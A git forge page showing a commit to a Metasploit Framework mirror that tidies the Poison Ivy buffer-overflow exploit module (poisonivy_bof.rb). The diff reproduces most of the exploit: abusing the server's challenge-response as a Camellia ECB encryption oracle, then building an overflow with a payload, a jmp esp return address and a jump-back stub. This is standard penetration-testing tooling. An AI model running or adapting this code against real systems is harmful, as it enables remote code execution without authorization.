infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean exploit method

bug/bundler_fix
jvazquez-r7 2015-09-16 16:14:21 -05:00
parent d6a637bd15
commit 88fdc9f123
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 8 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/windows/misc/poisonivy_bof.rb
View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'StackAdjustment' => -4000,
'Space' => 10000,
'BadChars' => "",
'Space' => 10000
},
'Platform' => 'win',
'Targets' =>
@ -151,29 +150,29 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Performing handshake...")
# plaintext header
plaintextHeader = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
plaintext_header = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# crafted challenge (first 32 bytes is our plaintext header), abuse challenge-response as encryption oracle
challenge = plaintextHeader + ("\x00" * (256 - 32))
challenge = plaintext_header + ("\x00" * (256 - 32))
sock.put(challenge)
# response = encrypt(challenge, key)
response = sock.get_once
# since encryption is done using Camellia in ECB mode, we can cut and paste the first 32 bytes (our header inside the crafted challenge) without knowing the key
encryptedHeader = response[0, 32]
encrypted_header = response[0, 32]
# Don't change the nulls, or it might not work
xploit = ''
xploit << encryptedHeader
xploit << encrypted_header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack("V") # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << [target.ret].pack('V') # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack('V') # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status("Sending exploit...")
print_status('Sending exploit...')
sock.put(xploit)
select(nil,nil,nil,5)
disconnect